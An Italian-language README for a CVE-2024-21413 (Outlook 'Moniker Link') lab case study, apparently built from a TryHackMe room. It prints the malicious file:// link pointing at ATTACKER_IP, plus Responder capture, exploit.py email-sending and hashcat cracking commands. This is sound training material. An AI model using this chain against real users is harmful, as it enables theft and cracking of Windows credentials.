
Un caso di studio del CVE-2024-21413. Usato come parametro la stanza di TryHackMe Moniker Link (CVE-2024-21413). Fatte modifiche con claude code nell'exploit.
⚠️ Avviso Legale: Questo repository è esclusivamente a scopo educativo e di ricerca sulla sicurezza. Tutte le dimostrazioni sono state eseguite in ambienti controllati e isolati. L'uso di queste tecniche contro sistemi senza autorizzazione esplicita è illegale e antietico.
| Campo | Dettaglio |
|---|---|
| CVE | CVE-2024-21413 |
| Divulgazione | 13 febbraio 2024 (Patch Tuesday) |
| CVSS Score | 9.8 (Critico) |
| Prodotto | Microsoft Outlook |
| Tipo | RCE + Furto di Credenziali (Hash NTLM) |
| Vettore | Rete / E-mail (senza autenticazione preventiva) |
| Interazione | Richiede l'interazione dell'utente (click sul link) |
| Soprannome | Moniker Link |
La CVE-2024-21413 è una vulnerabilità critica in Microsoft Outlook che consente a un attaccante di:
Il nome "Moniker Link" deriva dallo sfruttamento dei Moniker COM (Component Object Model) — un meccanismo di Windows per referenziare oggetti tramite stringhe — per bypassare le protezioni di Outlook contro i link file://.
Normalmente, Outlook blocca i link file:// che puntano a risorse di rete, mostrando un avviso di sicurezza (Protected View). Il difetto risiede nel modo in cui Outlook elabora gli URL che contengono il carattere ! — un separatore di Moniker.
Un link malevolo nel formato:
file:///\\ATTACKER_IP\share\!something
Il carattere ! fa sì che il parser di Outlook interpreti l'URL come un riferimento a un Moniker COM, ignorando i normali controlli di sicurezza. Il risultato:
L'attaccante invia un'e-mail → La vittima clicca sul link → Outlook elabora l'URL con "!"
→ Bypass della Protected View → Connessione SMB automatica → Hash NTLM catturato
Per riprodurre questo caso di studio in sicurezza:
| Macchina | Sistema Operativo | Ruolo |
|---|---|---|
| Attaccante | Kali Linux | Listener SMB + Exploit |
| Bersaglio | Windows 10/11 con Outlook vulnerabile | Vittima |
Importante: Usa una rete isolata (NAT o Host-Only in VirtualBox/VMware). Non eseguire mai su reti reali.
# Responder — listener SMB/HTTP per la cattura degli hash
sudo apt install responder
# Python 3 — per eseguire l'exploit
python3 --version
# Verificare la connettività tra le macchine
ping <IP_BERSAGLIO>
ip a | grep inet
# Annota l'IP dell'interfaccia che comunica con il bersaglio (es: 192.168.56.10)
Il Responder crea un server SMB fittizio che cattura gli hash di autenticazione NTLM.
sudo responder -I eth0 -v
# Sostituisci eth0 con la tua interfaccia di rete
Output atteso:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-BERSAGLIO\utente
[SMB] NTLMv2-SSP Hash : utente::DESKTOP-BERSAGLIO:...
python3 exploit.py \
--sender [email protected] \
--recipient [email protected] \
--server <IP_SERVER_EMAIL> \
--attacker-ip 192.168.56.10
Quando la vittima apre l'e-mail e clicca sul link, il Responder cattura automaticamente l'hash NTLM. Questo hash può essere:
hashcat -m 5600 hash.txt wordlist.txt
Vedi il file exploit.py per lo script completo e commentato.
Vedi il file diagrama-ataque.html per una visualizzazione interattiva del flusso completo dell'attacco.
Vedi il file MITIGACAO.md per la guida completa a mitigazione e difesa.
Vedi il file CVE-BREAKDOWN.md per l'analisi tecnica dettagliata della vulnerabilità.
Caso di studio sviluppato come parte dell'addestramento pratico in sicurezza offensiva tramite TryHackMe.
Questo progetto segue i principi di responsible disclosure e ethical hacking. Tutti i contenuti qui presenti mirano all'educazione e al miglioramento della postura di sicurezza.